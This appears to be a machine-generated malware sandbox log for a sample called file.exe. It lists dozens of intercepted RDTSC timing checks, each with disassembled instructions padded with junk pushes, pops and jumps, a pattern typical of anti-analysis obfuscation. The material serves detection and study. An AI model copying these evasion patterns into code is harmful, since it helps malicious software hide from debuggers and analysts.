Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805EB1 second address: 805EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBF65139DA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 806000 second address: 806020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FBF65139596h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FBF6513959Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 806020 second address: 806042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007FBF65139DA6h 0x0000000c jmp 00007FBF65139DB4h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 806042 second address: 80604D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FBF65139596h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80604D second address: 806053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 806053 second address: 80608B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651395A9h 0x00000007 jmp 00007FBF651395A1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jbe 00007FBF65139596h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 810066 second address: 810078 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBF65139DAAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80EE09 second address: 80EE2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBF65139596h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007FBF6513959Fh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80EE2D second address: 80EE3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FBF65139DA6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80EE3A second address: 80EE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FBF651395A8h 0x0000000b jng 00007FBF65139596h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80EE60 second address: 80EE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80EE66 second address: 80EE95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FBF651395A3h 0x00000010 popad 0x00000011 jno 00007FBF6513959Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80EE95 second address: 80EE99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80EE99 second address: 80EEA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FBF65139596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80F38B second address: 80F3D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FBF65139DB0h 0x0000000e push ebx 0x0000000f jmp 00007FBF65139DAAh 0x00000014 jmp 00007FBF65139DADh 0x00000019 pop ebx 0x0000001a popad 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FBF65139DB8h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80F79A second address: 80F79E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80F904 second address: 80F913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FBF65139DAAh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80FAAE second address: 80FAB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80FAB7 second address: 80FABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80FF3C second address: 80FF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a jne 00007FBF65139596h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 815768 second address: 81576C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81576C second address: 815772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 815772 second address: 815778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81447A second address: 81448A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FBF65139596h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81448A second address: 8144AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FBF65139DAEh 0x0000000e pushad 0x0000000f popad 0x00000010 jp 00007FBF65139DA6h 0x00000016 jmp 00007FBF65139DAFh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8144AF second address: 8144BF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF651395A2h 0x00000008 jno 00007FBF65139596h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8147B0 second address: 8147B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8155B9 second address: 8155BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8155BF second address: 8155C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8155C4 second address: 8155DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651395A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8155DF second address: 8155ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBF65139DA6h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8155ED second address: 8155F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8155F2 second address: 8155FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BD19 second address: 81BD23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBF65139596h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BD23 second address: 81BD40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF65139DB3h 0x00000007 jo 00007FBF65139DA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EA5C second address: 79EA6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF6513959Dh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81ABB8 second address: 81ABBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81ABBE second address: 81ABE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651395A2h 0x00000007 jmp 00007FBF6513959Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop esi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B130 second address: 81B14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF65139DB7h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B14B second address: 81B15A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF6513959Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81A763 second address: 81A76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B443 second address: 81B447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B756 second address: 81B760 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF65139DB2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B760 second address: 81B766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AD23 second address: 82AD30 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EBDC8 second address: 7EBDCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC226 second address: 7EC239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FBF65139DA8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC38E second address: 7EC393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC393 second address: 7EC399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC399 second address: 7EC39D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC64E second address: 7EC66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dx, 80B4h 0x0000000c push 00000004h 0x0000000e mov edx, dword ptr [ebp+122D36E3h] 0x00000014 push eax 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jng 00007FBF65134596h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECA85 second address: 7ECA8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECA8A second address: 7ECA90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECA90 second address: 7ECA94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECD83 second address: 7ECD87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECD87 second address: 7ECD90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A15D second address: 82A163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A163 second address: 82A194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FBF65561B61h 0x0000000b pop ebx 0x0000000c jl 00007FBF65561B52h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A704 second address: 82A72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnl 00007FBF65134596h 0x0000000c popad 0x0000000d jmp 00007FBF651345A5h 0x00000012 jo 00007FBF6513459Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A72E second address: 82A74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBF65561B55h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A74F second address: 82A753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A753 second address: 82A77C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF65561B55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnp 00007FBF65561B46h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A77C second address: 82A780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A8EF second address: 82A90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBF65561B46h 0x0000000a jmp 00007FBF65561B4Ch 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A90E second address: 82A912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D0E7 second address: 82D0F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FBF65561B4Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D0F8 second address: 82D115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 je 00007FBF65134596h 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jnc 00007FBF65134596h 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82CC4E second address: 82CC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82CC52 second address: 82CC58 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82CC58 second address: 82CC60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82CC60 second address: 82CC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F763 second address: 82F769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82FA1D second address: 82FA31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FBF65134596h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82FA31 second address: 82FA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82FA35 second address: 82FA3F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF65134596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82FBD3 second address: 82FBD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82FBD7 second address: 82FBF5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 pushad 0x00000009 jne 00007FBF65134596h 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007FBF65134596h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 832088 second address: 83209E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FBF65561B46h 0x00000010 jnl 00007FBF65561B46h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83209E second address: 8320B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF6513459Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83856D second address: 838571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838571 second address: 83857A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 836EC0 second address: 836EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 836EC4 second address: 836EC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83713E second address: 837142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 837142 second address: 83716F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBF65134596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jo 00007FBF65134596h 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBF651345A3h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC82B second address: 7EC82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC8E9 second address: 7EC8EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC8EF second address: 7EC8F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 837869 second address: 83787E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651345A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83787E second address: 837883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83AAD9 second address: 83AADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83AC32 second address: 83AC49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF65561B4Eh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83AC49 second address: 83AC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E631 second address: 83E637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E637 second address: 83E647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jbe 00007FBF65134596h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E647 second address: 83E64B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E781 second address: 83E787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E787 second address: 83E7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FBF65561B54h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FBF65561B46h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E7AF second address: 83E7CF instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF65134596h 0x00000008 jmp 00007FBF6513459Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 jbe 00007FBF65134596h 0x00000018 pop ebx 0x00000019 rdtsc
